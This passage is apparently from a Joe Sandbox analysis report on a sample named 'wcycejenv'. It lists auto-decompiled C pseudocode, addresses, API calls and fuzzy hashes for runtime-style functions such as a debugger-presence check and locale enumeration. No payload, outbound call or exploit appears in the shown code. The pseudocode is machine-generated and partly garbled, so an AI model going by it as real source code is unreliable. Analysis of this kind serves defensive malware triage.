				void* _t19;
				signed int _t21;
				signed char _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t26;

				_t24 = __edx;
				_t23 = __ecx;
				_t8 = IsDebuggerPresent();
				_t26 = _a4;
				_t22 = _t21 & 0xffffff00 | _t8 != 0x00000000;
				if(_t8 == 0) {
					L5:
					__eflags = E00433AF8(_t23) - 2;
					if(__eflags != 0) {
						L11:
						_t11 = (_t22 & 0x000000ff) + 3;
						__eflags = _t11;
						return _t11;
					}
					__eflags = E0042D0A5(__eflags);
					if(__eflags == 0) {
						goto L11;
					}
					__eflags = E0042D1AC(__eflags);
					if(__eflags != 0) {
						_t14 = E0042D119(__eflags);
						_push(_a12);
						_push(_a8);
						_push(_t26);
						_push(_t14);
					} else {
						_t17 = _a12 | 0x00200000;
						__eflags = _t17;
						_push(_t17);
						_push(_a8);
						_push(_t26);
						_push(0);
					}
					return E0042CF5D(_t22);
				}
				if(_t26 != 0) {
					E0043D109(_t24, __edi, _t26);
				}
				if(E00433B6D(_t23) == 1) {
					goto L5;
				} else {
					_t19 = 4;
					return _t19;
				}
			}

0x00430a14
0x00430a14
0x00430a1b
0x00430a21
0x00430a26
0x00430a2b
0x00430a46
0x00430a4b
0x00430a4e
0x00430a87
0x00430a8a
0x00430a8a
0x00000000
0x00430a8a
0x00430a55
0x00430a57
0x00000000
0x00000000
0x00430a5e
0x00430a60
0x00430a78
0x00430a7d
0x00430a80
0x00430a83
0x00430a84
0x00430a62
0x00430a65
0x00430a65
0x00430a6a
0x00430a6b
0x00430a6e
0x00430a6f
0x00430a6f
0x00000000
0x00430a71
0x00430a2f
0x00430a32
0x00430a32
0x00430a3f
0x00000000
0x00430a41
0x00430a43
0x00000000
0x00430a43

APIs

IsDebuggerPresent.KERNEL32 ref: 00430A1B

Part of subcall function 0043D109: __cftoe.LIBCMT ref: 0043D150
Part of subcall function 0043D109: OutputDebugStringW.KERNEL32(00000000,?,?,?,?), ref: 0043D15F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: DebugDebuggerOutputPresentString__cftoe
String ID:
API String ID: 3697724916-0
Opcode ID: 5230d3c7a349415199e25cbc99541011b4d7758db6d5214fed2608f5d291d54f
Instruction ID: 5c61d0398a22082057940634585a2e3cb0cef060665c0f9b35242d8d46dd2a33
Opcode Fuzzy Hash: 5230d3c7a349415199e25cbc99541011b4d7758db6d5214fed2608f5d291d54f
Instruction Fuzzy Hash: 26F0F43250032577EF303E927C52BBF2B09AF1D3A9F181107FD1896242C62CC81196BE

Uniqueness

Uniqueness Score: -1.00%

Function 00436A21 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00436A21(void* __eflags, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				signed int _t26;
				intOrPtr* _t28;

				_push(_t15);
				_t8 = E0042DA10(_t15, _t21);
				_t26 = _a4;
				_t23 = _t8;
				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
					L7:
					_t11 = 0;
				} else {
					if(_t26 == _v8 || _a8 == 0) {
						L6:
						_t11 = 1;
					} else {
						_t28 =  *((intOrPtr*)(_t23 + 0x50));
						_t19 = _t28 + 2;
						do {
							_t13 =  *_t28;
							_t28 = _t28 + 2;
						} while (_t13 != 0);
						if(E00436576( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				return _t11;
			}

0x00436a26
0x00436a29
0x00436a2e
0x00436a31
0x00436a55
0x00436a89
0x00436a89
0x00436a57
0x00436a5a
0x00436a84
0x00436a86
0x00436a62
0x00436a62
0x00436a65
0x00436a68
0x00436a68
0x00436a6b
0x00436a6e
0x00436a82
0x00000000
0x00000000
0x00000000
0x00000000
0x00436a82
0x00436a5a
0x00436a8e

APIs

Part of subcall function 0042DA10: GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
Part of subcall function 0042DA10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004367BE,00000000,00000000,?), ref: 00436A4D

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 9b69aeed6409eaa468da1a9c8a9f76afd063d82bb7cb74877590df32a3b403de
Instruction ID: eb80a6a01cf1a27844d5ee6fe007b406b00bb8a65e92341acdb85a21e314fb96
Opcode Fuzzy Hash: 9b69aeed6409eaa468da1a9c8a9f76afd063d82bb7cb74877590df32a3b403de
Instruction Fuzzy Hash: 10F0F932A001137BDB24A7658805ABB7F68EB45354F16C42EEC06B3240DA38FE41C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 00436517 Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00436517(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_t26 = E0042DA10(__ecx, __edx);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t26 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t26 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E00436576( *((intOrPtr*)(_t26 + 0x50)));
				}
				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
				EnumSystemLocalesW(E004367F5, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x00436524
0x0043652a
0x0043652b
0x0043652e
0x00436531
0x00436531
0x00436534
0x00436536
0x00436544
0x00436547
0x0043654a
0x00436555
0x00436555
0x0043655e
0x00436561
0x00436567
0x0043656d
0x0043656f
0x00000000
0x0043656f
0x00436575

APIs

Part of subcall function 0042DA10: GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
Part of subcall function 0042DA10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

EnumSystemLocalesW.KERNEL32(004367F5,00000001,00000000,?,-00000050,?,00436B94,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00436561

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: bc0abe5a968307403c0db7cd87d977e212978bc891b31cd1fd152b5357aec1ff
Instruction ID: b55e861abc4c03b161c35664bbcc7468c374ba99c353be04805e8278c530e875
Opcode Fuzzy Hash: bc0abe5a968307403c0db7cd87d977e212978bc891b31cd1fd152b5357aec1ff
Instruction Fuzzy Hash: 84F046363003067FDB245F39E885A7B7B91EF84368F16843EFA024B690C6759C01C608

Uniqueness

Uniqueness Score: -1.00%

Function 0042C1E7 Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0042C1E7(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				signed int _t29;
				void* _t31;

				_push(0xc);
				_push(0x4513e8);
				E00408200(__ebx, __edi, __esi);
				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
				E00433897( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				 *0x456af0 = E0042C2B5( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
				_t29 = EnumSystemLocalesW(E0042C1D4, 1);
				_t17 =  *0x454264; // 0x8c4320d5
				 *0x456af0 = _t17;
				 *(_t31 - 0x1c) = _t29;
				 *(_t31 - 4) = 0xfffffffe;
				E0042C257();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
				return _t29;
			}

0x0042c1e7
0x0042c1e9
0x0042c1ee
0x0042c1f3
0x0042c1fc
0x0042c202
0x0042c213
0x0042c225
0x0042c227
0x0042c22c
0x0042c231
0x0042c234
0x0042c23b
0x0042c245
0x0042c251

APIs

Part of subcall function 00433897: EnterCriticalSection.KERNEL32(?,?,00436FD8,?,00451648,0000000C), ref: 004338A6

EnumSystemLocalesW.KERNEL32(0042C1D4,00000001,004513E8,0000000C,0042CB10,00000000), ref: 0042C21F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 2aae3fa92b7f2b852f8b6bec3116e49e23d2852b5cfe9a1623737bfd36e4f64c
Instruction ID: a5bcdbbd408cc29533ce2e710e5eab330713def4dfa76625c00142161d5e3998
Opcode Fuzzy Hash: 2aae3fa92b7f2b852f8b6bec3116e49e23d2852b5cfe9a1623737bfd36e4f64c
Instruction Fuzzy Hash: F0F03C36A40311DFD704DF99E846B5D77F0EB45725F1041AFF821AB2A1CB7989008F58

Uniqueness

Uniqueness Score: -1.00%

Function 00436413 Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00436413(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;

				_t19 = E0042DA10(__ecx, __edx);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t21 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x43636c, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x0043641f
0x00436423
0x00436426
0x00436429
0x00436429
0x0043642c
0x0043642f
0x00436447
0x0043644a
0x00436450
0x00436456
0x00436458
0x00000000
0x00436458
0x0043645d

APIs

Part of subcall function 0042DA10: GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
Part of subcall function 0042DA10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

EnumSystemLocalesW.KERNEL32(0043636C,00000001,00000000,?,?,00436BF2,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0043644A

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ed415b53e463a00d3fd464adee654a5db08826de97c3753cb9be0fde64fc78b1
Instruction ID: 22ef7e56b5ab07f7eb6989af2071802accc9cee8ee6b0ac19f4d250013dc9c7c
Opcode Fuzzy Hash: ed415b53e463a00d3fd464adee654a5db08826de97c3753cb9be0fde64fc78b1
Instruction Fuzzy Hash: 9BF0553A70020667CB049F36D845A6B7F90EFC6714F17805EEA0A8B280C279D842C798

Uniqueness

Uniqueness Score: -1.00%

Function 0042CC9F Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0042A96A,?,20001004,00000000,00000002,?,?,00429CCB), ref: 0042CCD3

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: dfe02fbbfac136ca81663a76f01c9c74f5a3abbe6dc218eef1726a4ba0a197aa
Instruction ID: 3abcd41a099131d80eba91c54128d495517b14aeae3315e59fa63657230fee8e
Opcode Fuzzy Hash: dfe02fbbfac136ca81663a76f01c9c74f5a3abbe6dc218eef1726a4ba0a197aa
Instruction Fuzzy Hash: 28E0483564053DB7CF122F51EC05E9F7E15EF44750F444415FC0566260CB759D21BAD9

Uniqueness

Uniqueness Score: -1.00%

Function 0042C370 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042C370(void* __eax, intOrPtr _a4) {
				int _t5;
				intOrPtr _t7;

				 *0x456af0 = E0042C2B5(_a4);
				_t5 = EnumSystemLocalesW(E0042C1D4, 1);
				_t7 =  *0x454264; // 0x8c4320d5
				 *0x456af0 = _t7;
				return _t5;
			}

0x0042c38d
0x0042c392
0x0042c398
0x0042c39e
0x0042c3a5

APIs

EnumSystemLocalesW.KERNEL32(Function_0002C1D4,00000001), ref: 0042C392

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: bd5c3f3843732fd9a89e35e5ec56c510589e2f86f6bb3ec085434d1cfaa98acb
Instruction ID: 508e0168b418c2ea20e12ed85ddd3dcc7128f6fc8c66d10db389e6f626e91b50
Opcode Fuzzy Hash: bd5c3f3843732fd9a89e35e5ec56c510589e2f86f6bb3ec085434d1cfaa98acb
Instruction Fuzzy Hash: 3AD012345443199FDB049F60FC5BAA87B61F741341B81417EF8065B2A1DBB19851DF48

Uniqueness

Uniqueness Score: -1.00%

Function 0042C33E Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0042C33E(signed int __eax, void* __ebx, intOrPtr* __ecx) {
				int _t7;
				intOrPtr _t11;
				signed int _t12;

				_push(__ebx);
				if ((__eax ^ _t12) != 0) goto L1;
				 *((intOrPtr*)(__ecx - 0x3d)) =  *((intOrPtr*)(__ecx - 0x3d)) + __ebx;
				 *0x456af0 = E0042C2B5( *((intOrPtr*)( *__ecx)));
				_t7 = EnumSystemLocalesW(E0042C1D4, 1);
				_t11 =  *0x454264; // 0x8c4320d5
				 *0x456af0 = _t11;
				return _t7;
			}

0x0042c340
0x0042c341
0x0042c343
0x0042c357
0x0042c35c
0x0042c362
0x0042c368
0x0042c36e

APIs

EnumSystemLocalesW.KERNEL32(Function_0002C1D4,00000001), ref: 0042C35C

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: b9e610beba157c1242c1a903a52e1555cbe559e31427bdb972acaed234577650
Instruction ID: c62e1229d167b28ecd7f31ff509f01a2fbaa3e5f1625daa1ebcba48b23764f26
Opcode Fuzzy Hash: b9e610beba157c1242c1a903a52e1555cbe559e31427bdb972acaed234577650
Instruction Fuzzy Hash: D0D017B46443529FCB049B60EC9AA183B61A74230979041BFF4028B2A2DBA59800DB0D

Uniqueness

Uniqueness Score: -1.00%

Function 0042C378 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042C378(intOrPtr _a4) {
				int _t3;
				intOrPtr _t5;

				 *0x456af0 = E0042C2B5(_a4);
				_t3 = EnumSystemLocalesW(E0042C1D4, 1);
				_t5 =  *0x454264; // 0x8c4320d5
				 *0x456af0 = _t5;
				return _t3;
			}

0x0042c38d
0x0042c392
0x0042c398
0x0042c39e
0x0042c3a5

APIs

EnumSystemLocalesW.KERNEL32(Function_0002C1D4,00000001), ref: 0042C392

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 845e0274c295045747dd71c802d525939ce071057eb812d66c9ceecf50394212
Instruction ID: ab965ed0333886a9594533411febd2d51ff9f8c9ca23270d46fe6adf94b8531e
Opcode Fuzzy Hash: 845e0274c295045747dd71c802d525939ce071057eb812d66c9ceecf50394212
Instruction Fuzzy Hash: 94D0A734544305ABDB045F61FC4BE143B66E3C2311B80017EF8060B3A2DFB19C40CA4C

Uniqueness

Uniqueness Score: -1.00%

Function 0042CCDE Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

GetSystemTimePreciseAsFileTime, xrefs: 0042CCE4, 0042CCEE

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID: GetSystemTimePreciseAsFileTime
API String ID: 0-595813830
Opcode ID: 2c72d12b81a81c28a7cc0ff877821a774b98b0ca00bf8d99477a60a3b8bbe845
Instruction ID: 990bf1b5abdfbc06a1b5b4df5ef795acb23124ddfa43629b7750a53f229f9978
Opcode Fuzzy Hash: 2c72d12b81a81c28a7cc0ff877821a774b98b0ca00bf8d99477a60a3b8bbe845
Instruction Fuzzy Hash: 24E0C2367C023977A3102B95AC0AF9FBA04DB40BF1F540173FA0896280AAA99C10C6DC

Uniqueness

Uniqueness Score: -1.00%

Function 00436D8B Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00436D8B() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x456ea4 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00436d8b
0x00436d93
0x00436d9b

APIs

GetProcessHeap.KERNEL32 ref: 00436D8B

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 84b019ef09dd86898f73a07094143608f7d7d88fcbc31b7656f9dc8dfcfa909a
Instruction ID: 82d7afc7a4b8812a6a99da4239f236314e0029dae45787cddc1178e0a6a45de7
Opcode Fuzzy Hash: 84b019ef09dd86898f73a07094143608f7d7d88fcbc31b7656f9dc8dfcfa909a
Instruction Fuzzy Hash: 43A00274502211CF9B404F359A4A20A3599694559174581755405C5165E76489505619

Uniqueness

Uniqueness Score: -1.00%

Function 00433B6D Relevance: .0, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00433B6D(void* __ecx) {
				char _v8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;
				char _t21;

				_t21 =  *0x456e94; // 0x0
				if(_t21 == 0) {
					_t21 = 2;
					_v8 = _t21;
					_t9 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t25 =  *((intOrPtr*)(_t9 + 8));
					if( *((intOrPtr*)(_t9 + 8)) >= 0) {
						E0042CA05(_t25,  &_v8);
					}
					_t11 = _v8 - 1;
					if(_t11 != 0) {
						_t13 = _t11 - 1;
						if(_t13 == 0) {
							_t21 = 1;
							__eflags = 1;
						} else {
							if(_t13 == 1) {
								_push(3);
							} else {
								_push(4);
							}
							_pop(_t21);
						}
					}
					 *0x456e94 = _t21;
				}
				return _t21;
			}

0x00433b74
0x00433b7d
0x00433b87
0x00433b88
0x00433b8b
0x00433b8e
0x00433b92
0x00433b98
0x00433b98
0x00433ba0
0x00433ba3
0x00433ba5
0x00433ba8
0x00433bba
0x00433bba
0x00433baa
0x00433bad
0x00433bb3
0x00433baf
0x00433baf
0x00433baf
0x00433bb5
0x00433bb5
0x00433ba8
0x00433bc2
0x00433bc2
0x00433bc8

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4118ff14dd3b3ec1b8869880fc35849540bce7b4838af2ca65855c98354825f
Instruction ID: 6c13c8f78ff5bf44d86905fb22383c2f20bd5c9ae7b58b93ea2a7e4c6450c0fd
Opcode Fuzzy Hash: c4118ff14dd3b3ec1b8869880fc35849540bce7b4838af2ca65855c98354825f
Instruction Fuzzy Hash: 79F0CD32640220ABCA26CE5CC549B59F2A8EB09B12F1111D7E501DB392CAA8EF00C388

Uniqueness

Uniqueness Score: -1.00%

Function 00433993 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00433993(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t8;
				intOrPtr _t11;
				void* _t13;
				void* _t15;

				_t8 =  *0x456e94; // 0x0
				if(_t8 != 0) {
					return _t8;
				}
				_v8 = _a4;
				_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t25 =  *((intOrPtr*)(_t11 + 8));
				if( *((intOrPtr*)(_t11 + 8)) >= 0) {
					E0042CA05(_t25,  &_v8);
				}
				_t13 = _v8 - 1;
				if(_t13 == 0) {
					_push(2);
					goto L10;
				} else {
					_t15 = _t13 - 1;
					if(_t15 == 0) {
